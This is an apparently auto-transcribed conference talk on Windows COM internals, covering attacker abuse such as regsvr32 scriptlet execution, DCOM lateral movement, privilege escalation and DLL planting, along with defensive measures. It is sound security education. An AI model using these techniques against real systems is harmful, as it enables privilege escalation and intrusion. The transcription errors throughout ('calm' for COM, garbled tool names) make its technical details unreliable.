BSides Iowa 2018: "Windows COM from the bottom up"

sure no problem Harry buddy I'm 83 born today I'll be talking about windows calm not windows calm I'm sure it's a what great website so we'll be talking about quite a few things but first I am also I'm on twitter at Mandark and website and so I'm trying to keep this kind of interactive so I feel free to ask questions also try to issue some pictures and I try to heat the glass down to a minimum so we'll try to see how well that works out so we're going to talk about the background of calm kind of why it's here and why it's here to stay and also like the title suggested we're going to talk from this from a red team

perspective as well from a blue team perspective as well so kind of get both sides rather than being red focus usually see in those kind of talks kind of give the blue teamers some tips and defenses as well they can work into their platforms or their environments and kind of use its knowledge as well from both sides to help I've better the the organization so like I said we'll start with C++ it's pretty heavy so this structure here for this comm interface it's pretty common what you see I'm just aive so background to perk windows calm and marks up at the time had some problems getting some products to integrate really in a not really easy

way but getting developers some kind of flexibility to help be more interoperable and so they also kind of like with the what we know today as programs to be pretty portable that wasn't really the case and so as this technology has been around for a long time like great books but unfortunately they're not visual so we associate things with Windows now with having a shell so you see a man shell in PowerShell there's no real calm so but as we'll see it's kind of like things were already familiar with with.net WMI and I think it's pretty cool it was pretty rad we'll see why so with the technology as old from the 90s and the idea has been around for a long

time it's been around for quite a while and so with that it's pretty well bedded in even with those tens a day so with this being invented you see really the abstractions of comm interfaces from the Windows operating system really not really shown as does a calm way of doing it you just see helping the file from one file from one folder to a different folder generally see below the covers of how it's being up how it's working or even if you have bed work files in a excel document it's so calm extracted Oh so as we can see here the picture on the Left we see a whole bunch of words generally matter a whole lot right now

my mouse know that show up so if you can see where it says prog ID count this number is gonna be pretty relevant not right away but keep in mind there's thousands of these objects here and so with that there's comm objects everywhere so being portable the first point the first problem is how you get portable and so it allows how to package things together and make it dynamic where they could be moved across machines and so with that the different kind of models kind of surfaced out of comm with oily and ActiveX and so with uh oh le as I mentioned was with how you would transfer files let's say with putting word into Excel making that really

seamless as we can see that's retro havoc with even with CV ease associated with phishing still being exploited today and ActiveX as we all know makes ie make bad life choices so that's been thankfully taken away for the most part we don't really see ActiveX used quite as often perhaps only in like the C type environments but all that really was built on the idea of comm does different extension of comm kind of building on top of that so calm has been talked a lot about so far but how do we see this well I mean you might be familiar with kind of calm being used and scripts might have downloaded like this a script

for example uses the scripting that file system object comm object and so you may have been familiar with that or probably more recently with a W script shell calm object and so these are all different comm objects that how we're using that to bubbling it up also if I can say comm 100 times I get a prize so I'm trying to bump up that off that word so you know it from here you see a lot of EB script it's pretty gnarly it's not less prettiest PowerShell so a PowerShell thankfully makes everything a lot simpler so well if we saw that DB script we had do a lot of different manipulation but with PowerShell it

makes it really easy to just do dollar sign comps make a new object a new object - comma object and double script that shell so we have a very simple way to consume come interfaces with a custom PowerShell object and if we just do just print out that comm object itself dollar calm and do puppet to get member we can see kind of all the methods associated with this comm interface so that makes it easy for administrators and bad guys to quickly consume comm objects so kind of before we get too far down that rabbit hole taking a quick break from our sponsors comm that really is a hot mess because you know there's been around for a long

time they had to put it somewhere they had put all this configuration information somewhere where people like developers and administrators could quickly get that information and use that and get it in a reliable and safe way so naturally the only way to put this is in the registry as we know that's a good place for goldmine of information and so Windows made this special class lot of font care did not want to go to this the HP classes root and so this combines both hqm the local machine and the current user hives into one super hive now will it twice as powerful and so this becomes important later on because as a user I can control

quite a few things and normally when things are down into the hklm hive that's usually a lockdown but if we have some place that a user can influence like in classes route that can cause quite a few problems and they don't also have to live in the registry of calm objects don't have to live in the registry they can also live as manifest files icon scriptlets that we'll see later on so to break down calm itself we need to understand how different parts of calm are referenced and how we can use that so back to the prior example we have the comma object double skip that shell that interface that's referred to as the prog ID and so

that makes like a simple interface way to reference a calm object but additionally you don't have to have that easier way you can refer to the quit type way with the interface ID but depending so but both of these are unique identifiers within the registry another way is to be referenced for any kind of opportunities as I mentioned there's a calm scriptlets those are the SCT files and so people throw around conscript late calm scriptlet but you know we might have heard of windows calm calm plus and how would you really know what is you know looking at it like this article fear for my zero-sum will this tweet how I know that it's a calm

scriptlet or the complex is it kind of like C and C++ where it's like similar ish but not really you won't really be able to compile I also use this G C C++ and C and hope it works out well so thankfully Microsoft to the rescue scripts are available of both income and calm plus from what I've seen it doesn't really matter from what I can tell you know I'm sure there may be some differences but from what I've seen there's not really much of a distinction between you know when you would call it calm or complex but like PowerShell scripts or VB scripts these kind of scripts are ways for us to do some

pretty fun things with triplets and I haven't really seen this attack but here's a little little fun opportunity so we can create comm objects' from a java class and so class files aren't you know if you were looking through DLP or having it your ad flag they might look for a dot SCT file but how many times do developers we've got files on machines how are you gonna know that's a malicious intent for comm or it's a developer's file for some kind of java project and so thankfully nobody has JRE installed anywhere in the enterprise I'm sure it's not one point seven or one point eight so that should be working out pretty well for us so one of the

people to really evangelize the of calm scriptlets you probably know him as a sub T or Casey Smith he really helped to evangelize the idea of abusing calm to you know cause problems and so this is all it really is for an su t file it's like an xml-based file and we can see just from like this one line that we're going to create an ActiveX comm object with the descriptive shell the shell object on the wins machine and call county XE and as we all know calc is very nefarious and I should never be run so just to quickly show this in action I'll shoot a second it's on my screen not sure what's on yours

what's the bad choice yes so we see that file we see that script object being called you know it's gonna be it's gonna be ran here and very soon we should see oh good you know we're using the script we do method here to call a register to register a SVG object that's a T file and that is runs our file using that Skip LeDoux method that we have seen probably not really too much more often now but definitely it's still a vector that needs to be thought of we're having our EDR solutions help us in our environments and so yeah we saw cough dot exe that's whatever but you know that could be definitely abused

for any kind of number of string objects or you know different a longer string calling all kinds of things to make a schedule task or do things like delete log files or a number of things so we had seen that built-in Windows command utility read server 32 being used to help run that SCT file and so that's a valid application on our machine because if used for any number of reasons for registering objects or were installing software we would use that but again you know being abused by attacker by an attacker we can see how SAT file looks harmless can simply do a lot of harm our environment and here we just I I just

kind of broke down that squiggly-doo command that we saw on the command line well command line and we saw that could run silently we don't want to register it on the server we want to be registered less so it's not persisted in registry and so if we try to uninstall it it's gonna run that object so it's a really fun way to help remove as less disk activity all this disk artifacts much as possible and so the fun thing is is it have to be on our system we can call it attacker system and that script abdi ll is what helps run those those SAT files so Microsoft likes to iterate likes anything's better easier thus was born

complex solve all of our problems like we can quickly in a more structured way manage calm in our environments and try to help make this a surface so administrators can help make enterprise type solutions and configurations for our calm environment in the system and so kind of give us a way to better manage calm and to really deal with it also the way fun thing is a head of some really awesome icons are now if you've ever gone to the complex application administration thing you see is really cool things like some screw head a box a little like a map pointer thing and we call it now I was like the dropper pin but you know it's for an interface and

it was really cool so I really like that I want to show this with you as well so if you thought of component services on a Windows machine and tries again if we chose a better way doing this

so component services on a it's pretty standard on a Windows machine it's a way to help see a complex objects on our machine so if we look here on accomplice applications we can see kind of the default comp things we have there and so we can see easiest easier ways for us to kind of browse different ways to examine what's available on our system the components there that can help make us you know more lockdown and more secure in environments that nobody goes into here and we forgot and I forgot about this but subtly cool icons oh I just all right so

you know we do it once we do it twice why not third time so let's iterate it again and we'll call it distributed calm D calm this helps us not only solve Commons on our machine but helps us wreck all across the environment why not do it at once so the Microsoft Way helps you with it being you know calm is more it's much more easily accessible across the environment than before so that's just really better for us for attackers it's not really backgrounds more like a Red Team focus background and so like most most Microsoft things it as soon as you know what you're doing so that's always dangerous I should go so the not only calm calm plus but now

we have decom ways of abusing the assistive technology kinda like with SB or with as a cm or a lot of opportunities and so as we can see here Matt Nelson here he has a script well he's a script but reversal he kind of weaponized it in a PowerShell script to have this PowerShell script invoke a decom based scriptlet that helps you know escalate privileges on the system so that's cool so we always want to be able to look backwards in anger integrate with legacy technologies because it's too hard just to you know start fresh every single year with Microsoft with that dotnet can reach back into calm and help attackers even more and so from that perspective we

call the Kobo wrapper that kind of helps manage that way we can interface with comma objects as attackers or I mean administrators and it may be easier for us so we it's a seizure c-sharp so it's not C++ I'm sorry about that but we can see here how we can still use dot with with calm and vice-versa we can go from calm to net and help escalate those kind of attack paths through calm which is probably not as well managed or as well looked at from a dotnet perspective with EDR solutions so they'll face some opportunities there to help really dive into that as an attacker me I just do this quickly do object attack pass and

that still works so you know we're all the try harder just yet to really dig down more into this whole mess of net and calm James for Shaw gave a pretty excellent talk last year at Derby con talking about the interoperability of dotnet and common pretty well worth looking at and trying to see more how this wall works together and yeah it's pretty good so back to c-sharp yeah we are really the positive side so most things with c-sharp you kind of have to take care of how you increment and how you use objects in c-sharp you C++ and so we can see here pretty standard things if we want to add a reference if we want to let's say create

a new object reference to this to a comma object or if we want to see what's available options available with this comma object as far as like you know with W script shell what kind of things would be additionally with that and so well move away from C C++ that's gross and kind of easier way to look at this is you know again with the add reference and release and so you know we still have problems with a use after freeze that console bugs that still is present today but you know may be attributed to comm objects not having you know been properly released and attackers taking advantage of those opportunities for UAF vulnerabilities but you know if we're

not able to fix open redirects reply should fix the low-hanging fruit first before we start digging - the harder things as we can see here we're still seeing use after free vulnerabilities even back from 2004 with comm based problems even today so definitely some take care of eventually but maybe not so we see that you know even today comm isn't really that technology that's forgotten or really a corner case we're still seeing problems with CDs I here with last month round calm that Microsoft still addresses with problems and with opportunities for bug bounties and attackers to help take advantage of this kind of thing we all look at the shiny new things but we still have the rotting

underbelly of Windows still hanging around again James for Shaw I was like a fanboy I guess I am up in he does a great talk you know usually bass rom-com and how that's being used like with VirtualBox or any things that you would find in our environment and so it's not really they're not really attacks are so magical or out of reach they're very actually very simple like doing scribbly do or doing partial scripts that help abuse these kind of things that we finally get home or are you bundled into cobalt strike and other tools like that but clouds been for a very long time so we go through a period of time where it's been talked about and oh my gosh

calm thing goes like oh it's calm oh my gosh calm and you know it's kind of Adobe issues we still see those I mean years ago all the dogs I'm Toby I know it's like nobody cares about Adobe it'll be a patch dispassion so attackers you know have been using common in variety of ways so with H Firefox with a UAC mean you know we're using these kind of interface comm interfaces to help escalate privileges and they still work so if it's not broke why fix it right Microsoft so you saw with first off you know still using abusing calm we can abuse things like VirtualBox to ask their privileges or even with cacey sympathy as I showed earlier with the

scribbly do with the consulate files and then Matt Nelson is to his blog article last year about abusing the Microsoft's malware interface to project a server and take privileges over that because normally these things that run with com operate at a higher level with a system or administrator account so if we take the advantage of calm that is already running a system or administrator so far here's a way of trying to compromise a user and then try to escalate up through there as well so calm but how can we see call from an attackers perspective you know it's not really that hard really to find calm related issues on even Windows 10 issues servers systems today so one

of the best ways to look for opportunities for exploitation is through a process Explorer it's a free tool by Microsoft helps kind of see like a running snapshot surprise how many times there's problems with the Windows system just chugging along but it is really if you look for past what you'll see later on well you'll see in this tool that you'll see medium to high integrity attack paths that really open up you know if you were to place say an attacker base DLL and at a location that Microsoft expects us to run to be there Microsoft will happily run that DLL that you supply in the path where it says they not found and it won't longer be

not found to be found and it will run your DLL and so another opportunity to explore is with our react to less these people have gone through and trying to reverse engineered Windows the best abilities so a lot of things said we would see in Windows are also reflected in react OS and so sometimes comrade typings will be in there it just all depends looking for specifically but unlike windows react OS is free and it's also used for a lot of different research for windows kernel mineral windows kernel vulnerabilities and other kinds of system level attack pads that we would find in Windows as well that's true they try to be as mirror as possible but

again a fanboy is I'm here for James for shop I'll meet him one day it's gonna happen his tool of oil of video of um and so you know go look at those component services we want through the registry that's really gross process Explorer runs endlessly and finds a lot of things you know if only there was a way we can quickly see calm goodies like James for trials tool and so remember how I talked about the you know W script at shell as a prog ID well his tool 2592 potential pass for you to escalate privileges on a system it's not really like translates to one to one ratio of abuse to interface but how many times

have you gone through a winning system when you're doing the system pardoning or doing review I thought I wonder if all 3592 of these common interfaces can't possibly be exploited like Dobby skipped out shell always can easily run a show to my system and run kappa exe so I don't have time but you know maybe you do or you know something else does that you can look and say huh I wonder number 1184 can be used to load a deal out or it could be used to make a system call or it could be a number of things and so and really just playing and time we can try to see if we find another attack

path through this interface another fun thing is James Forshaw his who'll also quarry all these comp interfaces at once and it's a really bad idea it'll probably cost some paint your machine but that's really fun because what's happening is his tool will query all 3592 ish interfaces at once and try to see what happens normally you would never do that you just do dive equip that shell or some kind of like a ioi file system info to help work with the file system never all at once but lot of fun things happen so if you do query all interfaces time you filter for a name not found with the high integrity running as a system level account you

could fire a lot of fun things like fondue dot exe I don't know puts a path for escalation what you would use for things like Paul I was the same Lesley security he had his workshop last year for DEFCON that kind of showed the different ways you can escalate privileges through this kind of very similar method and on its github but basically going through the same process where you're looking for things with bosses Explorer to fix privilege escalation issues that Microsoft won't fix they say it's a design issue it's also as is these are what they consider to be part of their scope for security issues but clearly escalating from a user to an administrator to us is a

security issue to them they see its design issue so again 2592 I'm just that one system I'm sure none of those are bad at all you know and so come you know we'll see this summer if any of the big conferences they show like the next big things we know we saw last year with zero-sum is who a dick the column C and C so this is all this is a purely comm based command control server platform like pull ball strike Belton calm I mean listening to his talk and kind of seen through his coat you can see there's a lot of pain associated with that because we're not really used to having deal with that pain we see abstracted male

layers above with PowerShell or much more friendly ways to consume those comm interfaces and use that but you know at the time he demonstrated how you know this is a new attack and using these kind of methodologies EDR products weren't really tuned to look for those kind of things and so me I'm sure hopefully by now it's been a while that these kind of sensors could be based you've developed to help detect these kind of basic activities so mitre also has their attack framework that really have breaks down really in a pretty well fashion different attack paths different kind of scenarios that help you as an organization simulate attacker activity so a lot of these things also take

advantage of comm so sub T is that the fountain that never stops of knowledge that helps give out new ways of calm attacks so as Matt Nelson and James for Shaw's bug tracker for Google excuse me Kozik talks in depth about the different ways that you know what's wrong with the pollicis or what's wrong with windows how this was abused and so just mining that information for gold it's pretty easy just you know focusing on comm asthma attack path is probably here to stay but you know it's one thing to have these schools available but it's nothing to run it out as well in our environment so if we were to run things like squiggly-doo or you know aquatic comm

stuff or the reverse shells and VOC decom powershell scripts you know can we detect that if we're you know are we running these things in our environment under a structured way that we are expecting it to be detected hopefully or not you know I think as us as red teamers and pen testers and security analyst we should also be using these tools that you know we think Oh calm that's dumb maybe it is I like it but if we're running that and it works is it so dumb because it works but you know are we catching these things with our products and so maybe we're seeing my tool Pompeii's tool runs that as privileges we see maybe not so hopefully that's

what helpful I learnt bubble up that we think it's probably a false positive so I think really if we run these tools rigorously we can kind of see our analysts and our blue team will you try to catch these kind of things that attackers aren't gonna help hey I'm attacker I'll be testing your environment here next week I'll be running these tools play and check them out too so I talked about a lot about red team that's what I like more but you know blue team's also cool you know Justin wouldn't want me to say that as well so you know blue team did a really hard job yeah everybody says oh he's got a

succeed once and latinas let's see a hundred times that's true but we can do a lot of things as well as an organization to help really push that along I mean by default Windows 10 is way more secure just inherently than Windows 7 Windows 8 so if we're not really trying to push the ball along to get our environment up to the windows 10 and latest version and Windows Server 2016 and I'm sure 2017 in 20x I mean that's just going to help by default stop a lot of things that we take for granted in order environments that things are it's always been there so these tools are always present and running so that our lockdown or a better

secured in our environments so with specter ops ste are the ter the device guard profiles really help us to lock down and prevent those kind of attacks that could be easily stopped so if we can get a lot of free help from Microsoft bi or free it's all relative with licensing if we get a lot of free help with that way of having these kind of advice to car profiles backup a lot of these kind of things it will stop a lot of different vectors and help us to really you know stop for free things we take for granted as well as I'm a huge proponent of this is PowerShell command line auditing so this

is a great thing because attackers if it works simply in the environment the party in mind might not catch it you know if I run PowerShell and I do things to bypass all kinds of things and we're committed by auditing and I'm looking for these kind of different events on the command line I can quickly alert and tell the blue team or analysts that there's bad things happening so I hundred percent endorse PowerShell command line auditing and reviewing it's really the keyword and reviewing for auditing and nobody looks at there's one dissing good but also you know back down to the platform itself the system itself we should use at least version five whenever possible

it just makes our harder for attackers to take advantage of the inherent weaknesses of earlier PowerShell versions so if we're funding them to higher versions of PowerShell across the environment that's gonna help us do a lot more things be more aware of what's going on or of Armand but if we're doing the auditing and we look for a - comm object how many times do you think users ever in their life open up our shell and then call a comm object probably so attacker will probably be the person doing - comm object double script that shell to make a point or attack or leverage some kind of attack without doing any ossification from my Daniel

Bohannon or any of those other tools that there to help mass that they're trying to you know see if this is easiest way possible and it works why would they change but if we're auditing that we can quickly pick up on that and so also there's a engines out there called dub you script and C script that can help run things like dotnet J's for files tool net to jscript so these are J script type files that help us do very similar things with usually calm focused attacks that help run these JavaScript type scriptlets in our environment but how many times do you think there is a serious need and a constant need to have

these binaries even available on a system you may think oh it's better for instance mm it's probably in well probably not but intelligent view testing and remove these capabilities out occurs usually get for free on a system like C script you know and also shout out to uh F pieces over there he has done this in his environment and live to tell a tale whereas a madman barnett was still running without these things in the environment I'm not saying go ahead and delete them or or block them but just kind of start exploring this kind of past where you take away attackers easier tools and force them to use tools like version 5 or other kind of attacks

that could be easy more easily detected and monitor and you know as like Justin talked about today with system on you know a sim is great but you know if you have more capability with Microsoft's focus of system on I mean why not there's a lot of great guides out there I'd help really push this product along helped us get a better visibility with our environment so if you know if possible try out system on I mean there's not really I can't think of a downside of trying that and see how well it works in the environment and see if it's picking up gaps that were not seeing as well another tool that just recently came out

by Microsoft is called Project fast so for my understanding it's very similar it's still very much early they're taking bit clients now but definitely more insight into or attackers type attack activities on the system and help us to bubble at finishing up two attackers sooner and faster so calm unfortunately is here to stay it's not like you know be be scrapped where we axe that and got PowerShell but if we force them to power show and other ways there are more cut that's gonna be a helpful for everybody and so you know there's still a larger parts of calm that we talked about today things like tree ask the things like talked about with Matt Nelson different attacks that

he leverages and things like markers of how different kind of interpretation of calm and the environment and as mentioned earlier with the exploits not really X voice you're just taking advantage of bad design decisions a Microsoft won't fix for whatever reason but still work and give us what we want in the end so who's winning in the end so if we can really help as a community by exploring noise objects rather than that die be stripped out shell and the file system objects kind of explore the other thousands of combat Jack's perhaps the even the easier for us I think as a whole as a community we could be even stronger and more secure but you know

not everybody takes the idea of calm seriously like Adobe I mean we have adobe coldfusion making comma objects sorry bad app of Windows then we have ColdFusion Homme objects I'm sure it's secure and I'm sure it's fine alright so for more fish calm my blog there has some slides so I reach out see through Twitter a little slack for folks you know mostly based in Omaha but feel free to join as well was it for more members and to talk security and are they any questions

you showed I think pretty early on there is a like a way if your conduct to execute it Java isn't Java class is that just like handing it off to a JVM that's already installed or that's like an SE to you but yeah what they are using that to you know using a Giri to call that class object class so like because like the Jerry would be installed by default but do you have good reason to salt the environment right so if you do then it's adding that common well it took sut file you have it on the disk and then you know use Jerry which I'm sure some of us have in salt you know just not you know

fixing them together for another path forward it's more like common windows and the car shop going forward but it's like this bubbling problem kind of like ours if they're using right now but just kind of bring it out to they like that from MCN and we saw that oh yeah you just call from Java as well I'm sure that's probably fun but it's not really probably explored or talked about I'm sure it is it sports somewhere yeah yeah thanks yep what do you what functionality that's that what useful functionality would you lose if you can disable comma work stations throughout enterprise well calm is kind of like the like framework parties everything so you can

turn it off okay how will do disable come see that fancy convex floor with a couple of services yeah well that's the column server but you could do like the register registration on top of the registered freak of comm objects with the SVT file they'll still run that interface it flips and registry or yes oh yeah comp there's things that you lose but you still run comp things I don't know if I'm I understand correctly in trouble as a sure I really explore that option but you know definitely worth exploring and see if that was bad yeah yeah anyway else how many prizes so let's talk about that all right next